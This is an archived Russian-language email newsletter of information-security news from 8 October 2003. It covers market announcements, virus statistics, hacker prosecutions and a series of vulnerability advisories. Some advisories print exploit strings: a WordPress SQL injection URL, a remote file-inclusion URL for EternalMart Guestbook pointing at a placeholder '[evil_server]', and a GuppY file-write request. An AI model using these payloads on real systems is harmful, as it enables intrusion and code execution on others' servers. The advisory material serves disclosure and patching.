Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/10/8 00:30 - 2003/10/8 23:30


Groteck: скоро обзор рынка техсредств безопасности США

8 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, даты

В № 6, 2003 журнал «Системы безопасности» планирует опубликовать обзор американского рынка производителей средств обеспечения безопасности. В статье будет представлен обзор основных игроков американского рынка безопасности, ситуация с их продукцией на российском рынке.

Данный материал поможет читателям составить адекватное представление об основных американских производителях систем безопасности, выбрать надежных партнеров для успешного сотрудничества. Обзор подготовлен с помощью Представительства Министерства торговли США в России, сотрудники которого предоставили информацию об американских производителях, заинтересованных в продвижении своего товара на российский рынок.

Мы приглашаем дистрибьюторов и реселлеров систем обеспечения безопасности американского производства разместить рекламу рядом с обзором американского рынка безопасности. За счет того, что материал ориентирован в первую очередь на инсталляторов, интеграторов и конечных пользователей, реклама в нем напрямую влияет на увеличение продаж. Обзор будет размещен на лучших рекламных позициях и дополнительно анонсирован на обложке.

Это новая форма работы, призванная повысить эффективность рекламной публикации. Согласно статистическим медиаисследованиям, размещение рекламы в тематической публикации усиливает рекламный эффект в 2-4 раза за счет создания дополнительной мотивации.

Также для рекламодателей этой статьи предусмотрен дополнительный бесплатный бонус: краткое интервью (об успехах американских торговых марок на российском рынке) с фотографией. Интервью предполагает ответ на стандартные вопросы (см ниже).

Рекомендую Вам рассмотреть возможность размещения рекламы Вашей компании в журнале №6 «Системы безопасности». Срок подачи материала до 20 октября 2003 года.

Размещение рекламы Вашей компании рядом с таким материалом – прекрасная возможность позиционировать компанию на российском рынке безопасности и увеличить эффективность Вашей рекламной политики. Это целая рекламная программа в одном номере журнала. Контактная информация в сводной таблице производителей и официальных дистрибьюторов придаст значительность Вашему статусу, а интервью поможет привлечь внимание к Вашей компании.

По оборудованию американских производителей (список прилагается) мы проводим поиск российских инсталляторов и представителей. Если Вы уже являетесь или заинтересованы стать дистрибьютором указанных компаний, пожалуйста, свяжитесь по телефону или электронной почте solodovnikova@groteck.ru до 20.10.2003.

Если у Вас есть собственные исследования мировых рынков безопасности, Вы можете прислать их для обсуждения возможности публикации. По мнению редакции, это самый эффективный способ привлечь внимание потребителей к Вашей продукции.

ПРИЛОЖЕНИЕ 1: вопросы для интервью

АМЕРИКАНСКИЕ ПРОИЗВОДИТЕЛИ СРЕДСТВ ОБЕСПЕЧЕНИЯ БЕЗОПАСНОСТИ И ИХ ИНТЕГРАЦИЯ НА РОССИЙСКОМ РЫНКЕ

1. Что вы можете сказать о распределении рынка с точки зрения основных производителей? Назовите ключевых производителей/поставщиков в данной отрасли.

2. Как вы оцениваете объем спроса на различные категории товаров? Какие товары пользуются наибольшим/наименьшим спросом?

3. Что вы можете сказать о ценовой политике ведущих производителей?

4. Каков размер рынка?

5. Каков объем производства?

6. Можете ли вы дать прогноз развития рынка систем безопасности на ближайшие три года? Какие тенденции сейчас являются определяющими на этом рынке? (объем, структура, темпы роста, конкурентная среда)

7. Можно ли выделить лидирующего производителя в каждом технологическом сегменте?

ПРИЛОЖЕНИЕ 2: американские компании, представители которых приглашаются для контакта:

1. ABS Consulting

2. Advantor Systems Corporation

3. Ancore Corporation

4. Bende&Sons

5. CCS International

6. Dragonheart

7. Eagle Bear Security Company

8. EYI-EMEA

9. FabEnCo

10. Geonex International Corp.

11. Global Security Products, Inc (USA)

12. Griffin Technologies

13. Identatronics Inc.

14. K&M Environmental, Inc

15. Kallman Worldwide, Inc.

16. MST, Inc./Modern Safety Techniques

17. Nabco

18. Quest Technologies Inc.

19. Rothco

20. Safe Passage International, Inc

21. SafeSuppliers

22. SAF-T-GARD International Inc.

23. Shell Information Technology International

24. Trojan Securities International

25. TrustWorks Systems

26. Verify First Technologies

0

Вирусы – бич компьютерных сетей

8 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Компьютерные вирусы – настоящий бич и стратегических сетей, и домашних компьютеров. В 2003 г. произошло более чем пятикратное увеличение абсолютного количества вирусов в почтовых сообщениях -основном канале распространения вредоносных программ. Уровень зараженности составляет один вирус на 215 писем.

Это свидетельствует о том, что распространение вирусов по электронной почте носит характер эпидемии. При сохранении нынешних тенденций более половины почтовых посланий окажутся инфицированными уже к 2009-2010 гг. Если сегодня около 12% писем не доходят до адресата из-за ошибок спам-фильтров провайдеров, то неизбежное введение тотального антивирусного контроля при взрывном увеличении зараженности почты может полностью парализовать деловую и личную переписку.

Выросла также скорость распространения гибридных вирусов. Например, интернет-червь Slammer заразил компьютеры во всем мире в течение нескольких часов. Один из последних вирусов MS Blaster инфицировал 2500 компьютеров каждый час.

Аналитики компании Symantec прогнозируют значительный рост распространения интернет-червей, что приведет к перегрузкам в аппаратных средствах и парализует сетевой трафик.

Результаты исследования специалистов компании Symantec показывают, что число кибератак в 2003 году возросло на 19%. Компания Symantec зарегистрировала 1432 новых интернет-червей (на 12% больше, чем за первую половину 2002 года).
1


Судьба Максима Ковальчука будет решаться в пятницу

8 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

10 октября 2003 года, в пятницу, состоится очередное заседание суда Таиланда по вопросу об экстрадиции гражданина Украины Максима Ковальчука (Высочанского), который обвиняется США в совершении компьютерных преступлений.

В ходе этого заседания будет заслушан сам обвиняемый. Об этом сообщил на брифинге во вторник, 7 октября, руководитель пресс-службы Министерства иностранных дел Украины Маркиян Лубкивский.

По его словам, такое решение принято в ходе судебного заседания 1 октября, на котором выступил представитель американской стороны.
2


ФБР не хватает улик против Адриана Ламо

8 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

В понедельник чиновники министерства юстиции США заявил, что при уведомлении журналистов о возможности вызова их повесткой в суд ФБР не соблюдало все необходимые процедуры.

Напомним, что двадцатидвухлетний Эдриан Ламо обвиняется ФБР в получении несанкционированного доступа к базе данных информационной системы газеты New York Times. По мнению ФБР, он выкрал частную информацию о примерно 3000 подписчиков (адреса, телефоны, номера карт социального страхования), сделал в базе данных пять фальшивых учетных записей, которые использовались для доступа к платным ресурсам LexisNexis в течение трех месяцев, и нанес, по мнению истцов, ущерб в размере 300000 долларов США.

Security Focus более полутора лет назад опубликовал статью на эту тему, в которой Ламо давал интервью и рассказывал подробности о взломе NY Times. Там же сообщалось, что Ламо уведомил, по своему обыкновению, пострадавшую сторону об уязвимости их информационной системы через репортера Security Focus.

19 сентября этого года ФБР разослала письма репортеру Associated Press Теду Брайдису и некоторым другим журналистам с требованием сохранить любые документы, имеющие отношение к делу Адриана Ламо.

Как раз по поводу этой рассылки должностные лица министерства юстиции США заявили, что сначала агенты ФБР должны были испробовать все остальные подходы и улики и обращаться к материалам прессы лишь, после того как следствие окончательно зайдет в тупик.

На то и похоже - две недели назад Ламо был выпущен под залог в размере 250000 долларов США с небольшими ограничениями свободы, о чем уже сообщалось ранее.

3

Патч для Internet Explorer в Windows Server 2003

8 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Компания Microsoft выпустила обновление для браузера Internet Explorer, поставляемого в комплекте с ОС Windows Server 2003. От всех других версий IE вариант для Windows Server 2003 отличается включенным по умолчанию режимом повышенной безопасности, позволяющем блокировать многие атаки, опасные для других версий Windows. Однако в реализации этого режима имеется недоработка, приводящая к тому, что данные о работе браузера в разных зонах безопасности записываются неверно. В частности, при записи в журнал не делается различий между сайтами, к которым применяется режим повышенной безопасности, и доверенными узлами, страницы которых отображаются без ограничений. Это значительно осложняет анализ журналов работы браузера.

4

Организованная преступность штурмует Сеть

8 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Организованные преступные синдикаты расширяют свое присутствие в Сети, используя возможности интернета для рэкета, распространения детской порнографии и совершения финансовых махинаций. Самой уязвимой их целью является рядовой интернет-пользователь, утверждает главный «киберполицейский» Великобритании.

Лен Хайндз (Len Hynds), главный суперинтендент уголовной полиции и глава Национального департамента по борьбе с преступлениями в сфере высоких технологий Великобритании (NHTCU), отмечает, что организованная преступность ищет самый слабый элемент в цепи, которым и является обычный пользователь. "На самом деле, слабым звеном являются пальцы, бегающие по клавиатуре, на любом конце транзакции", - заявил он. По словам г-на Хайндза, криминальные синдикаты можно найти в любом уголке земли. Расследования не раз приводили специалистов NHTCU в восточноевропейские страны – такие, как Украина, Россия и Латвия.

Преступные группировки оттачивают свои навыки работы в интернете, учитывая рост электронной коммерции и количества сделок, совершаемых в онлайне. "Организованная преступность под всеми своими личинами отличается исключительной гибкостью. Они наметили в качестве своей цели эту новую и прибыльную возможность", - отметил Лен Хайндз.

За два года существования NHTCU эта оперативная группа из 55 человек провела около 110 арестов по обвинениям в таких преступлениях, как шантаж и рэкет, проходящим по делам о киберпреступлениях и хакерстве.

Правоохранительные органы многих стран мира говорят о том, что криминальные структуры нанимают сообразительных программистов для проворачивания в интернете мошеннических операций в банковском и коммерческом секторах. Самый распространенный на сегодняшний день вид мошенничества, затрагивающий финансовые организации, – это создание поддельного веб-сайта банка или компании, который внешне очень похож на настоящий. Далее необходимо лишь заманить ничего не подозревающих пользователей интернета на фальшивый сайт, где они оставят номер своей кредитной карты и другую банковскую информацию. По данным NHTCU, лишь в этом году от подобного мошенничества постарадали 40 британских компаний, в то время как год назад их было всего 7.

По словам Лена Хайндза, хакерские атаки, которые некогда рассматривались лишь в качестве проделок скучающих подростков, желающих показать всему миру свое умение взламывать чужие компьютеры, также становятся все более распространенным оружием в руках организованной преступности. Некоторые предпочитают совершать DoS-атаки («отказ в обслуживании») - заваливание IP-адреса данными с целью вызвать крах операционной системы или отключение интернет-соединения, - на серверы интернет-провайдеров и онлайновых казино. Хакеры грозятся повторять атаки до тех пор, пока им не заплатят выкуп.

Однако самый «горячий» участок работы NHTCU (впрочем, как и для подобных подразделений по всему миру) – это выявление распространителей детской порнографии. Почти половина из всех арестов, проведенных NHTCU, была произведена по обвинению в педофилии. По словам Лена Хайндза, в этом киберполицейским помогают представители коммерческих и государственных структур, коллеги из аналогичных подразделений по всему миру, которые возвращают используемых мошенниками детей к нормальной жизни. Германской полиции, к примеру, удалось недавно прекратить деятельность международной группировки, зарабатывающей деньги на детской порнографии, услугами которой пользовались 26,5 тыс. пользователей Сети в 166 странах мира.

5

Microsoft модифицирует Explorer, чтобы обойти постановление суда

8 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

Во вторник Microsoft представила то, что она называет «умеренными изменениями» в Windows и Internet Explorer, — в ответ на патентный иск, поданный против софтверного гиганта компанией Eolas Technologies.

Microsoft подготовила изменения в надежде обойти патентные притязания Eolas, лишающие Explorer способности исполнять интегрируемые модули Apple Computer, Macromedia, RealNetworks и других компаний. Microsoft уже передала предварительную версию браузера веб-разработчикам, которые используют ее для создания собственных сайтов и приложений.

В августе федеральный суд Чикаго постановил, что Microsoft должна выплатить Eolas и Калифорнийскому университету 521 млн долл. за нарушение патента на технологию плагинов (plug-in). Патент принадлежит университету, который лицензировал его Eolas в 1994 году.

Eolas рассчитывала на то, что Microsoft будет выплачивать лицензионную плату за спорный патент, однако софтверный гигант решил изменить браузер, продолжая обжаловать решение суда. «Это постановление касается не только Microsoft — оно касается широкого круга партнеров и заказчиков, включая компании, которые можно считать нашими конкурентами, — говорится в заявлении Майкла Уоллента, генерального менеджера Microsoft по клиентской платформе Windows. — Microsoft поспешила предпринять шаги к тому, чтобы ослабить или исключить последствия постановления суда для заказчиков и других компаний, несмотря на то что мы подали апелляцию».

Изменения, внесенные Microsoft, относятся к способу управления IE некоторыми веб-страницами, использующими ActiveX Controls, технологии объектно-ориентированного программирования и инструменты, содержащиеся в плагинах типа Macromedia Flash, Apple QuickTime и RealNetworks RealOne. Microsoft обещает внести изменения в IE к началу 2004 года.

Если веб-разработчики не последуют изменениям, рекомендуемым Microsoft, перед посетителями их сайтов, прежде чем в IE будут загружены спорные плагины, может появляться окно с предупредительным сообщением. Microsoft работает с партнерами над рекомендациями по проектированию веб-страниц, которые сделают такие всплывающие окна необязательными.

Так как плагины служат ключевым элементом и других веб-браузеров, решение в пользу Eolas может повлиять и на такие компании, как Opera Software, или проекты open-source типа Mozilla.org, а также на компании, распространяющие браузеры или основанные на них продукты — Red Hat, SuSE Linux, Apple, Hewlett-Packard и др.

6

IM-черви могут развивать невероятные скорости

8 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Компьютерный червь, передаваемый через системы обмена сообщениями, теоретически может заразить полмиллиона компьютеров за 30 секунд.

До сих пор не было создано вируса, распространяющегося через IM-системы. Однако специалисты по компьютерной безопасности утверждают, что заражение таких приложений представляет очевидную и очень серьезную угрозу.

Специалисты провели ряд тестов и моделирований, благодаря которым удалось установить упомянутый примерный предел скорости распространения вируса по IM-приложениям. В основу тестов было положено время, необходимое для обмена пакетами информации между IM-приложениями и среднее количество пользователей в контакт-листе интернет-пейджера.

По словам руководителя научной группы, проводившей исследования, среднее время, которое потребуется IM-червю для инфицирования 500000 машин - 30 секунд. Даже в самом пессимистичном (для червя) сценарии это займет меньше трех минут.

На сегодняшний день в IM-клиентах найдено около 60 "дыр", через которые мог бы проникнуть червь. Найти другие машины для заражения червю не составит труда: контакт-лист каждого IM-клиента хранится в незащищенной папке и может быть легко использован.

Однако, у IM-сетей есть и определенные способы защиты от такого рода эпидемий. Например, эти сети имеют центральный сервер, на котором происходит вход пользователя в систему и последующий обмен данными с другими пользователями сети. Распространение червя вызовет скачек трафика, который попросту "завалит" сервер, останавливая при этом и эпидемию.

Централизованные системы также могут использоваться для быстрого залатывания "дыр" в пользовательских приложениях. Некоторые сети уже имеют функцию автоматического отказа от обслуживания устаревших версий IM-клиента.

Скорость IM-коммуникаций несравнимо выше, как и потенциальная скорость распространения червя по ним.

7

Защита документов от Hitachi встраивается в шрифты

8 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Новая технология от Hitachi может положить конец неавторизированным копиям документов. Как сообщает издание The Inquirer со ссылкой на Nihon Keizai Shimbun, методика использует 64-битный секретный код, который может быть вставлен в предложение длиной в 60-70 символов.

Код добавляется к шрифтам и незаметен при чтении, однако может быть обнаружен при использовании специального ПО и сканера. Подобная техника уже используется для защиты полноцветных фото- и графических изображений, однако Hitachi впервые смогла применить ее к черно-белому тексту. Новость должна обрадовать не только секретные госдепартаменты, но и многие высокотехнологичные компании, которые обычно крайне недовольны просачиванием коммерческих сведений в средства массовой информации.

8

Флэш-носители c биометрикой для защиты доступа к ПК

8 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Флэш-носители Sony Micro Vault теперь могут служить средством идентификации пользователя ПК. Это стало возможно с появлением новой модели - Micro Vault with Fingerprint Access, которая оснащена сканером отпечатков пальцев.

В памяти Micro Vault with Fingerprint Access могут храниться до 10 отпечатков пальцев, причём один человек может сохранить несколько своих отпечатков для обеспечения надёжности опознания, если, например, один из пальцев будет поранен.

С новым носителем поставляется специфическое ПО. Например, завершение работы скринсейвера будет возможным только в случае касания сканера авторизованным пользователем. Отпечаток пальца может использоваться и для шифрования данных как на диске компьютера, так и в памяти самого носителя Micro Vault with Fingerprint Access. Ещё одно удобство - возможность хранения на флэш-носителе данных об избранных веб-сайтах вместе идентификатором пользователя и паролем. Любимые сайты можно будет посещать, просто приложив палец к сканеру отпечатков.

Объём памяти Micro Vault with Fingerprint Access составялет 128 Мб, передача данных производится по интерфейсу USB 2.0. Устройство работает со всеми версиями Windows, на платформе Macintosh требуется MacOS X и выше, но функции сканирования Mac-пользователям будут недоступны.

Продажи устройства в Европе начнутся в ноябре 2003 г. Стоимость его составит 150 долларов США - на 45 долл. дороже, чем носитель Micro Vault той же ёмкости, но без сканера отпечатков.

9

Sql инъекция в Wordpress / b2 cafelog

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Wordpress 0.x (b2 cafelog)

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в Wordpress / b2 cafelog . Удаленный атакующий может выполнить нападение SQL инъекции.

Программное обеспечение не фильтрует параметры cat и order_by. Злонамеренный пользователь может манипулировать SQL запросом, используя символы табуляции.

Пример/Эксплоит:

index.php?cat=100)%09or%090=0%09or%09(0=1

URL производителя:http://wordpress.org/latest

Решение: Уязвимость устранена в 0.72 Release Candidate 1

10

Слабые разрешения в PrimeBase SQL Database Server

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: PrimeBase SQL Database Server build 4212

Опасность: Низкая

Наличие эксплоита: Не нужен

Описание: Две уязвимости обнаружено в PrimeBase SQL Database Server. Злонамеренный пользователь может манипулировать файлами и получить поднятые привилегии.

1. Инсталляционный процесс небезопасно создает файл "/tmp/PrimeBase.log". Злонамеренный пользователь может сконструировать символьную ссылку из этого файла к критическому системному файлу, который будет перезаписан

2. Директория "/usr/local/primebase" создается с небезопасными разрешениями (read, write, и execute) для всех пользователей.

URL производителя:http://www.primebase.de/

Решение: Измение разрешение на уязвимом каталоге. Ограничьте доступ к системе только доверенным пользователям.

11

Выполнение произвольного PHP кода в EternalMart Guestbook

8 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: EternalMart Guestbook 1.1

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.

Сценарий "auth_func.php" не проверяет местоположение PHP файла, включаемого в переменной "emgb_admin_path". В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]

URL производителя: http://www.eternalmart.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно найти на http://www.phpsecure.info.

12

Множественные уязвимости в GuppY

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: GuppY 2.x (aldweb miniPortail)

Опасность: Высокая

Наличие эксплоита: Да

Описание: Множественные уязвимости обнаружены в GuppY. Злонамеренный пользователь может выполнить XSS нападение и раскрыть пароль администратора.

1. Удаленный пользователь может обойти фильтрацию входных данных, используя "[]", вместо "<>". В результате злонамеренный пользователь может включить произвольный код сценария в "ptxt" параметр.

2. Несколько пользовательских данных хранятся в "GuppYUser" куки, разделенные символом "||", включая параметр форматирования (7 параметр), который включается в сообщения. В результате злонамеренный пользователь может внедрить код сценария в сообщения.

3. Удаленный пользователь может манипулировать голосованием из-за ошибки в проверке правильности параметра "to" в сценарии "tinymsg.php". Уязвимость может использоваться для добавления произвольных данных в любые перезаписываемые файлы. Пример:

/tinymsg.php?action=2&from=Youpi!||Great!||rose||10000&msg=1&to=./poll

4. Комбинируя 2 и 3 уязвимость, удаленный пользователь может получить доступ к файлу "admin/mdp.php" в котором содержится MD5 хеш пароля пользователя "admin".

Пример/Эксплоит:

URL производителя:http://www.freeguppy.org

Решение: Установите обновленную версию программы (2.4p4): http://www.freeguppy.org/download.php?lng=en

13

DoS против пакетного фильтра OpenBSD

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: OpenBSD 3.x

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в OpenBSD. Удаленный пользователь может вызвать отказ в обслуживании.

В некоторых случаях, можно обратится к свободной памяти pf (Packet Filter). В результате работа pf аварийно завершиться, когда используется директива "scrub".

URL производителя:http://www.OpenBSD.org

Решение: Установите соответствующее исправление:

OpenBSD 3.2:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/019_pfnorm.patch

OpenBSD 3.3:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/006_pfnorm.patch
14

Отказ в обслуживании в OpenBSD APR запросами

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: OpenBSD 3.2-3.3

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в OpenBSD. Злонамеренный пользователь в локальной сети может вызвать отказ в обслуживании.

URL производителя:http://www.openbsd.org

Решение: Установите следующие исправления:

OpenBSD 3.2:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/021_arp.patch

OpenBSD 3.3:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/008_arp.patch
15

Множественные уязвимости в mod_gzip 1.3.x debug mode

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: mod_gzip 1.3.x debug mode

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Множественные уязвимости обнаружены в режиме отладки mod_gzip. Удаленный атакующий может выполнить произвольный код на уязвимой системе. Локальный пользователь может получить root привилегии на системе.

1. Удаленный пользователь может запросить чрезмерное длинное имя файла, чтобы вызвать переполнение буфера в механизме регистрации. Уязвимость может использоваться для выполнения произвольного кода с привилегиями Web сервера.

2. Удаленный пользователь может представить специально обработанный HTTP GET запрос, чтобы вызвать уязвимость форматной строки в механизме регистрации Apache Web сервера. Атакующий может выполнить произвольный код.

3. Третья уязвимость связанна с небезопасным созданием временных файлов. Локальный пользователь может создать символьную ссылку с временного файла к произвольному критическому файлу на системе. Когда mod_gzip будет запущен, критический файл будет перезаписан. mod_gzip регистрирует некоторые события отладки с root привилегиями, т.е. уязвимость позволяет локальному пользователю получить root привилегии на системе.

Пример/Эксплоит:

URL производителя:http://sourceforge.net/projects/mod-gzip/

Решение: Установите следующее исправление (patch < mod_gzip.diff):

--- mod_gzip_debug.c 2003-10-06 18:10:47.000000000 +0200
+++ mod_gzip_debug.patch 2003-10-06 18:13:53.000000000 +0200
@@ -94,6 +94,7 @@
 #include "httpd.h"
 #include "http_config.h"
 #include "http_log.h"
+#include <stdlib.h>
 
 #include "mod_gzip.h"
 #include "mod_gzip_debug.h"
@@ -125,7 +126,7 @@ void mod_gzip_printf( const char *fmt, .
 
  va_start( ap, fmt );
 
- l = vsprintf( log_line, fmt, ap );
+ l = vsnprintf( log_line, sizeof(log_line), "%s", fmt, ap );
 
  va_end(ap);
 
@@ -138,6 +139,8 @@ void mod_gzip_printf( const char *fmt, .
 
 void mod_gzip_printf( const char *fmt, ... )
 {
+ long rndNum;
+ time_t seed = time(NULL);
  int   l;
  char *p1;
  FILE *log;
@@ -153,6 +156,11 @@ void mod_gzip_printf( const char *fmt, .
  long pid = (long) getpid();
  #endif
 
+ srand(seed);
+
+ rndNum = 1+ (int)(1000.0*rand()/(RAND_MAX+1.0));
+ rndNum *= pid; 
+
  #ifdef WIN32
  sprintf( logname, "c:\\temp\\t%ld.log",(long)pid);
  #else
@@ -168,7 +176,7 @@ void mod_gzip_printf( const char *fmt, .
 
  va_start( ap, fmt );
 
- l = vsprintf(log_line, fmt, ap);
+ l = vsnprintf(log_line, sizeof(log_line), "%s",fmt, ap);
 
  p1=log_line;
  while((*p1!=0)&&(*p1!=13)&&(*p1!=10)) p1++;

16

Доступ к Local Zone в Windows Media Player DHTML (ПАТЧ)

8 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Microsoft Windows Media Player 6.x, Microsoft Windows Media Player 7.x, Microsoft Windows Media Player 9.x

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Windows Media Player. Злонамеренный пользователь может внедрить злонамеренный URL в медийный файл, который выполнит произвольный код в Local Zone.

URL производителя: http://www.microsoft.com/

Решение: Microsoft выпустил обновление для Windows Media Player 9 для Microsoft Windows 2000, Microsoft Windows XP и Microsoft Windows Server 2003:

Windows Media Player 9 Series for Microsoft Windows 2000, Microsoft Windows XP, and Microsoft Windows Server 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=AF9CF65E-0C55-452E-A0FA-3AA165E667C1

Windows Media Player 6.4, 7.1, or 9 for Microsoft Windows Millennium Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=E864688C-B176-4D3C-BE67-211DE4BF9BD0

Windows Media Player 6.4 for Microsoft Windows NT 4.0 Server:
http://www.microsoft.com/downloads/details.aspx?FamilyId=189F0319-A6FB-461A-9A15-2E677BE4681F

17

Клавиша Shift снимет защиту от копирования CD

8 октября | Рубрика: Информационая безопасность бизнеса

Как заявил 7 октября выпускник Принстонского университета, ему удалось придумать способ взлома нового ПО для защиты музыкальных компакт-дисков от копирования на компьютер: отключить защиту можно одним лишь нажатием клавиши Shift.

Если верить сайту Джона Холдермана (John Halderman), программное обеспечение MediaMax CD3 от компании SunnComm Technologies можно отключить на Windows-машинах простым нажатием клавиши Shift, которая не дает системе автоматически запускать защитную программу на компакт-диске.

Джон Холдерман рассказал также об еще одном методе обхода программной защиты от копирования: нужно прервать установку драйвера, которая автоматически запускается при первом обращении к компакт-диску. Также диск можно свободно скопировать на машинах под управлением ОС Linux и старых версий Mac OS, где ПО для защиты от копирования вообще не работает.

ПО MediaMax CD3 было широко разрекламировано как новый прорыв в защите дисков от копирования и предотвращении музыкального пиратства. Компания SunnComm никак не прокомментировала заявление Холдермана. Представители звукозаписывающей компании BMG, чьи диски были защищены при помощи MediaMax CD3, заявили о том, что знали о возможности взлома ПО вышеописанным способом и что данную защиту от копирования в компании рассматривали лишь как своеобразного «спящего полицейского», метод защиты от массового пиратства.

По словам Джона Холдермана, который занимался изучением различных способов защиты CD-дисков от копирования, а также отношения пользователей к подобной защите, это ставит под сомнение эффективность последних попыток индустрии звукозаписи. По его словам, любое исключительно программное решение этой задачи (как предлагает SunnComm) можно обойти самыми простыми методами. Альтернативные методы защиты, предполагающие изменение формата данных на CD, вызовут массовое недовольство пользователей из-за несовместимости с разными типами проигрывающих устройств.

18




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное